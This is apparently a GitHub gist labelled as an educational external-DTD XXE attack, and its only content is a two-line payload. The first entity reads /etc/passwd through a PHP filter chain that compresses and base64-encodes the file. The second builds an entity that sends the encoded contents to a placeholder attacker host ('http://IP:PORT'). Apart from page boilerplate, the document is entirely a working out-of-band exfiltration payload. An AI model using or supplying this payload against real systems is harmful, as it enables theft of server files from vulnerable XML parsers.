Created
December 14, 2024 08:06
-
-
Save mamad-1999/99a4e87642cc5a151cf138e9c03ffc00 to your computer and use it in GitHub Desktop.
External dtd XXE attack (educational purposes)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=/etc/passwd"> | |
<!ENTITY % init "<!ENTITY % trick SYSTEM 'http://IP:PORT/?p=%file;'>" > | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment